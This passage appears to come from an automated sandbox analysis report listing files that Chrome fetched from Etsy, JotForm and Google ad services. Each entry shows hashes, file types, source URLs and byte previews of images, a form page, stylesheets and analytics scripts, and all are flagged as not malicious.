                                                                                                                                                                              SHA-512:4B1D902875EBEE25576DA1957E2F48D050E870F816407AA9676017593CE3358EA07F1954D7D5EED5000DC11C20C8E54FA26CD9B210456FB1E40DFA71CE754A47
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\..........."........................................B.........................!1.."AQa.2q.....BR..#3br.$..C.%Ss.....................................1........................!1AQ..aq.."2...#R..3B..............?..^.v.M..f...;,q.Z.$........j2.....v..v.Ir..7.. G.?.k......SM.J.mZ.s)`.n.x`..G.i....]KJ.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87220
                                                                                                                                                                              Entropy (8bit):7.9647972108168865
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0793F7268C506DE07AFBA34C441A1A25
                                                                                                                                                                              SHA1:C7299E430C7A0F8721A6D6F0FAA6F1ED80939D12
                                                                                                                                                                              SHA-256:0F74ACBA30180203B0B2C783084AEB88D04E01DD0B38C719A2CC17BD13C49D69
                                                                                                                                                                              SHA-512:FB142FC876C04B327B3E6D7AA44F2C5DC55E3950F702197A24CDDDB3485B790202C02433FAD76462528809553B66AD66DE9713B619FA6CFC11B67645CB1983AC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X.."........................................C.........................!.1A"Q..aq#2....B..R.3b...$r..C...4S.%c..................................<.....................!..1.AQaq..".2......#BR...3Cr.Db..$S.............?....1C4@0a...$R...X.}._m....MMJj.k....h.........v..3...8..nuiQ<x....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16414
                                                                                                                                                                              Entropy (8bit):7.977652784735676
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6BAA16DA21FBC696276ADB6D396BD9BB
                                                                                                                                                                              SHA1:64684505DCE61AECE8CECFF456EDCDB283E69FA1
                                                                                                                                                                              SHA-256:48D6FD5443CE15E52B21DE03930F5F5C612A53A8D61762E4FDAB8D7C02F0FA09
                                                                                                                                                                              SHA-512:C6AF01553142DD91F20402D3215800BB7460BF72550EDD4B08501643A388679A5FB426BDBE377FCD7B6F103FD1D293BABBE1615F9B694562ABD2F710C97D953B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/14114560/c/1252/995/176/181/il/a2594e/2576998560/il_340x270.2576998560_h1iu.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................?....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................?.mdat....."*p...h4 2.}. ...A@..^...(0.e:V+M......[:.$<..."..(.".....J/......,s3..y.9\.iL..5...0:./.....@..S..a.._........kV|.%..{JJ..+../...zy.x..qs..y..V.*o..;.8..O.....Q...a......-...`..&.....E..z.v...\...f.S]...J.fy..........n..|..m....;.K.~......;.....9.........O$....&p...{.R(.6..".......1.<.f..'2\&)nw...M..S...I.8>.37..AOt..E.N..xI_.g..=H=g7k.~.W......<..9...UC..w6cQ.D..-82Koc..r....d'4@y..].F..9E.:W.%@P,.;J..Yen...:y...R...../-B..S.[...O.~n.*.H..<.}.4/.Q.N..s..[.$.#.t..y.H.9.k.rf.Y.sa...sAh)V.D;4.G3.q.....u..../..oi.x.7.....V...@.8...l....e.Z.........J..D..Sc...".A=<..cO~H7..qa6".....o...J4..|....[..iX.....r..#w.-.....q...{.........V"..,.S..;J..@...h,..r.^..<.........]...JN=..,..j5
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):64842
                                                                                                                                                                              Entropy (8bit):7.99633651141215
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E985B03D45B2CB89CA5C44FCD157908D
                                                                                                                                                                              SHA1:2337FE37F82E9CE8F71E2A8476BA47F72942BADC
                                                                                                                                                                              SHA-256:BEC1AF190AB999743ECC3E886A377A43408E2C771E60B0A0D48CCED523C8E1D6
                                                                                                                                                                              SHA-512:4C2D64DE7171E4F619C831278D21F9EC9407B6BCC85702E6B814A9ED72B1639535D18FE06EC4AB6ACB0E09970A34F8979E0CCC3EA35F4A1B710FD599042C3869
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/30543447/r/il/a2ddfd/4911225755/il_600x600.4911225755_sho5.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................<...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................Dmdat.....&ey_.....2........1@..*R.t..:...O.....%.....U.kj....!....\.o.V.......L%g..V..h....kf.....E2.. .........<......s.....R...`...k.[Q*G..=.........q0...Qn...:..u...w..B.%.?.op.+k....Y...........1.|....iX.f..7B.a...'&...&8.YD.p.....,F..62#..srI..$/..W.~.;3.)..&...sq.o7a7@...f.....\,...X.....4....O..t+p.. ..J.....\.y#.....l...x...I.PS.1..R.d...@".D.Dw..S.X..H.5?...-...0..J.....H.Z.A...7..=Ps..q.v>3.o[.&....k..S9.N<....o..z.FAQ.q.o~X...(.I...=.x..C..5M.[..=%.Q.....GkL.Z.M8*j.".9.zip..,g........*..W..S......8..^.Z...=...:).....TF...u...U.k....H.@D...)....-$>.."...\.......gM....'.....+....W'/.X.....S2.M.Y.......L..t..>.TP....2e..Mfz...O.:...A^.K).!...uI)4....,....SI..........T.)..'.x.T.U....;|.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4541
                                                                                                                                                                              Entropy (8bit):4.547207054314023
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C9B1E823DAF18CE62EC81B2FFF8E6F10
                                                                                                                                                                              SHA1:55A03A4B0EE51227E16244D6433B830A878EF1E6
                                                                                                                                                                              SHA-256:8D90A15260B4AB2C0B4F966A20AC7A0CBCC40CDE9F3BB341E54B658481751CEE
                                                                                                                                                                              SHA-512:DF1640FA8AEFB4BB544772EC32C663201624E554548FE3BDB9F8036340393F0257C0E4AAAAC96F07DC6350FFED58F7B5F40B77C42A20AEF0F04112BB6502E0A2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/submit/242923371946059
                                                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>Please Complete</title>. <link type="text/css" rel="stylesheet" href="https://submit.jotform.com/css/styles/form.css"/>. <link type="text/css" rel="stylesheet" href="https://submit.jotform.com/themes/CSS/5e6b428acc8c4e222d1beb91.css?">. <script src="https://submit.jotform.com/js/prototype.js" type="text/javascript"></script>. <script src="https://submit.jotform.com/js/protoplus.js" type="text/javascript"></script>. <script src="https://submit.jotform.com/js/protoplus-ui.js" type="text/javascript"></script>. <script src="https://submit.jotform.com/js/jotform.js?v33" type="text/javascript"></script>. <link type='text/css' rel='stylesheet' href='https://submit.jotform.com/css/styles/form.css'/><style type="text/css">. .form-label{.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 75x75, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3254
                                                                                                                                                                              Entropy (8bit):7.480693126496098
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:211EA50867837764150C951F172EB9BD
                                                                                                                                                                              SHA1:4FDF5CB2C750FE44879621F2197B14A1BFDD43DA
                                                                                                                                                                              SHA-256:1A7BF0C7B107857D9CA8338E29CDBA0942453BDF09CB751BD157E334DBCA1BCB
                                                                                                                                                                              SHA-512:2FB1831A437A80AC486750AFDAA7B3272F81A56D1B28ABD5DA3FCBCE43361D8A7FB085C24AA2AA385DF986658B44E08A408BF1DDBA8C80048C9949DDD15DBBF1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......K.K..".........................................7.........................!.1..AQ."aq.#2..Rb..B...$C..................................'.......................!1..AQa..q..".............?.}6...........rt.o..K.F..P;kj..'a.Y...H.....54...l.&.A..o.V.........@.]%I#vWV.....9...=."...0.+
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5569), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5569
                                                                                                                                                                              Entropy (8bit):5.853226061570122
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7D4901061B7978861ED3A3E80019823B
                                                                                                                                                                              SHA1:56AE9D8299AAD3AAF39C1365C056F6A9A5A6655E
                                                                                                                                                                              SHA-256:39CEEEB9C9EB09BBBA5450AD7CA50A47B73A06618AC5D0F46C416622DCAE744C
                                                                                                                                                                              SHA-512:24FD86C0AEC4123852ECD61BECF51871B80D0C9148F276BB1B19B81B1780F2333784E38B9E14310372D625DA0B9E8528D2E650CEC1D08B74C0B8A445B49E258C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/995917074/?random=1729505312055&cv=11&fst=1729505312055&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children%27s%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D1592961087%3Becomm_pagetype%3Dproduct%3Becomm_totalvalue%3D15.00%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (3880)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):73063
                                                                                                                                                                              Entropy (8bit):5.422254954968471
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:80B72C2C26F81B3829F619DC6316D929
                                                                                                                                                                              SHA1:F9C1DFF0081E5B6247D0D9D9B54108116EAC7150
                                                                                                                                                                              SHA-256:233D3CEB1E61AA1665746DDDF8B6D2B830241BEEF23BE89BF77DA8D2559FB1C2
                                                                                                                                                                              SHA-512:D5D26E14FF31DD485A5EE16DD7A0E6BD5A050207B9D7367D94D799EAE3B16A6DE7A825CE0E0232E408989EE0151A94D5B9881444A9E36676F3FCFDB6A87FDBC4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/css/styles/form.css
                                                                                                                                                                              Preview:/*. *Form CSS. */..form-all {. margin: 0 auto;. font-family: "Lucida Grande", sans-serif;. font-size: 12px;.}..img {. max-width: 100%;.}...header-logo img {. max-width: none;.}../* if the user add formm in app builder */..isEmbeddedInPortal.isMobilePreview * {. cursor: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAYAAAA7MK6iAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAKxSURBVHgBxVc7i1pBFJ7rvmTjGkksFoTEwkfsFguN2CwIItiksbDLT0hhq4W1Qn6CjTY2NoIIgo0YBWXL9VGYQtjCBOOaxF1315zvOldujK9dvdkPDs4d5843c+6Zc74R2CMwmUzU9GMk05GpefeI7AomCMJo07mEdQM42RnZO066Ch2yC1rABduGmEjf0885mbpard6WSqWbQqFw22q17pvN5h3G6PV6ldPpPLDb7QfBYPDYZrPtU3efrLhqAcISQrjyA5kRhNFo9Dqbzd6wDeD3+48ikciJw+E4ZFMPZGgB/bXEnPTjYDB4GY/HB0T6kz0B4XBYEwqFTrRa7Q96TMyTC4tIu93uSSAQ+F4ul8dsC7hcroN0Ov3KYDBcz5PPE2Onb30+X29bUjl5LpfT086/EnFC6lfJSBG5Rrh3V6QA5orFYtixkQerCEFG/IkC6ZgitMcUQKVS0VPAPVDzM867ipNitzpEL1MIfG4pJ8xcfdZoNMabHpmnAHPjaLJpImIqKQ2mUqlfTGEgAbHpt1Zjx6forNVqd0xhIOvxpnFGTB9/Z5G8DO12W9qcDs
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):39886
                                                                                                                                                                              Entropy (8bit):7.955420085690165
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1A5CABE63616944D475C3CAB9C802DF9
                                                                                                                                                                              SHA1:9810A7A35DD8762A86E386B6262C75EAA2243C26
                                                                                                                                                                              SHA-256:0750CADE3265892AA290591E3333DCC28E9BC63C25C5EC8C7D790FE50FD927D6
                                                                                                                                                                              SHA-512:1A729D582E81916CEF2F3008E25613AAF482C03465A210DB80424B229CD42A41717A49D4D4D7DCABBF60364D8E30D9BE7090CC2694CA3B780F4AD69E155B64E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................E......................!..1A..Qa."q.....2.....#B...Rb3Cr.$.%...45Sc.................................D.......................!1..A.Qaq.."2...BR...$br.#3Cs..4..5DET.................?.......)Ub.H.Q=......!.!.Ub...Q...e.....n... -..(....T ...bU...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):283699
                                                                                                                                                                              Entropy (8bit):5.546701557676647
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2D5F5801409EF0DF05DE5260892E7CA2
                                                                                                                                                                              SHA1:CECC76CEB2F1CD421DCE049C06F72449F8C3C65A
                                                                                                                                                                              SHA-256:34A53D62A6A32A9794DD58B537CB76320CF70A5E06106E4BECB2DFAC1FEF3538
                                                                                                                                                                              SHA-512:E7378328CDBA683ACC53A434A1AF203A6C11527997A96AE4ED0A46118F7B75D7FD4F462D4E83A85F293B1025D1B41EBBE2AE490654ACA6ECEDB0744E1D40C248
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-658194373","tag_id":113},{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameV
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15016
                                                                                                                                                                              Entropy (8bit):7.977123718667387
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6F9BA480B7785796C55C5228DF7D1B49
                                                                                                                                                                              SHA1:59E606A3AE2228B9758C5FB7677C3D4BF0409CEC
                                                                                                                                                                              SHA-256:A67EEE2BC9C57931ED9D1A17480075D335966214F2EECFD016D76ACCC14A5BB4
                                                                                                                                                                              SHA-512:C662625A8A011DCE8F83A83ED42968976AC2C11A511F4DD62E9FD500823FEFCD03B6A1C985603990753355C2151C5290BB0C16A416D74E9EA24C5CEE9A1D3894
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/ij/a029e3/6388350577/ij_300x300.6388350577_pum96brt.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................9....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................9.mdat....."%r...h4 2.s.....!@.Q...,.pl..u.h..I.vD.6\.u..1.9q..JNb\..3.'.@.s^Q..i........M.b*2..:g.,....o..t....k(b.Z...P...`1..c7A..E......yW0..P...+p235...K.&.xW.^V.=.I..+.j.4..n7v.<..pO...tv&'u..zI.2.....X..\...(g.%. .Ip.d..........i..(...'.."..o......1".....j....@..7.j..<../..fO..`b~...2.F.F...(!j...qz..y.v..`.nb............T..ERF)...J.n..eb.........F./.....ib..3.+..W...z.\.X..-.....u.!I...k.....,...X....5.h.....S....J...E..sg..O.T@. ....;..8....8E.%Yn....j..W,SY._Ct.>T....z.s.qM|..$Nb...fL........d5.F>W......a.`Z..{4...Co d..=7.a...``....9S...Wc_....2.7.......i....F.W.ik"...k...7..t?.5.T.Uck...a."`...i...T.Rk.._.yY:_.....K..b...y...k5h...W.k.+M.r....j......l".:.{4[k....Z.B.D.]k.?.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):133907
                                                                                                                                                                              Entropy (8bit):7.966364862224924
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F96F476DB17F4643B386D05B905FF822
                                                                                                                                                                              SHA1:5E10898C8B34E09766E0343DF94AE4817E05E39E
                                                                                                                                                                              SHA-256:D01D92D1BEE5254A0506EA944C1EBF721F7BD4D29314127E32EFB46671533C29
                                                                                                                                                                              SHA-512:5405E719A2708F76F55A470D529956678B4F14959C9546397BEAC58387993ABF51656FFB1C998277FFE09D0D20BCC58DF324900DAEB3ADBFD4C613813FF838D4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................K..........................!1.A.."Qa2q.#B.Rb..$3r...C.S....%...4Tcs..&6..................................4......................!.1A"Qa..2q.....BR.#3.$.S...............?..........R.b6......5.+{......y.:...m)..}..d..*....^.6#......A.>4.*I._=..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):129674
                                                                                                                                                                              Entropy (8bit):7.977755481190149
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:539BD4D87707321344F4DEB5F28B4481
                                                                                                                                                                              SHA1:976985B5994435256879CB0FCEDF7EB9BC862842
                                                                                                                                                                              SHA-256:2BA77085163E15ECF12E6745BD4A7CBA0062370BB6DEB9AB99777D378293EABB
                                                                                                                                                                              SHA-512:F76DC7E7112A1A3854B695653003B9895DC550D738EAAC1909159B2572BE83F7C7FBF7FC18AD52D5FE4AEABEEAD566CFF40AD63829FABC208D09C20B216C71DA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................O.........................!.."1AQ..2aq#B....3R...$b..Cr...%4D...Scs....&T.5..6................................>......................!..1AQ."aq.2.....#3BRr..b.4..$Sc...%s.............?...E.....o}6..?,(;....`.7.....ez....*.%..f...j......q...3#.M
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (632)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):765
                                                                                                                                                                              Entropy (8bit):5.416734991211311
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E1FE7449549FBBC42BCEAAA8D928A2A3
                                                                                                                                                                              SHA1:F2900BE38188F0093D41C01A92ECBD65AA1F36EC
                                                                                                                                                                              SHA-256:6E4E3DB5706CD5F07D232CEA259DF3F7DFD4BC22295230B1B8E04ADDC5157E4B
                                                                                                                                                                              SHA-512:0599019B61519844A8699DF818E506C44FF2EEA3D431732CE9B30D75356BEFFDF5AA95F869093095B3F747E86303BFC8F143368CA160F21835FA10A19AE6CF39
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(()=>{var e={78661:(e,t,r)=>{e.exports=r(43177)(2678)},41103:(e,t,r)=>{e.exports=r(43177)(6917)},43177:e=>{"use strict";e.exports=etsy_libs_5d757f2bb98e91514c0f}};var t={};function r(c){var o=t[c];if(void 0!==o)return o.exports;var s=t[c]={exports:{}};e[c](s,s.exports,r);return s.exports}(()=>{"use strict";var e=r(41103);var t=r(78661);class c{constructor(){this.clickInit()}clickInit(){document.querySelectorAll("li.homepage_search_bubble").forEach((e=>{e.addEventListener("click",(()=>{t["default"].logEvent({event_name:"Homepage_Vesta_ApiSpec_ContentfulSearchBubbles_click"})}))}))}}(0,e.onWindowLoaded)((()=>{new c}))})()})();.//# sourceMappingURL=https://www.etsy.com/sourcemaps/evergreenVendor/en-US/vesta_homepage/search_bubbles.69e740adf2ffb50439ff.js.map
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):12930
                                                                                                                                                                              Entropy (8bit):7.974015575240253
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AAE60670F9D9AF5E1056FC8AE9600FE3
                                                                                                                                                                              SHA1:BE5EFFC4DDFBDC4C02D52E40863CBAD5614925D6
                                                                                                                                                                              SHA-256:0CB2DD06726D61CB60C3D00893631BBD90AA061472520295BEAB6F05D22EE67E
                                                                                                                                                                              SHA-512:DE809131539E89BC8427951A2A7228E1688F9FA3B816A3862724A492D72CF0F567FABB1517371BFEA1F2EEC50EB5322109F7CC6F42A2C89DADCCEAC5F21EA166
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/10370283/c/1785/1785/175/145/il/75cd84/4125126679/il_300x300.4125126679_tark.jpg
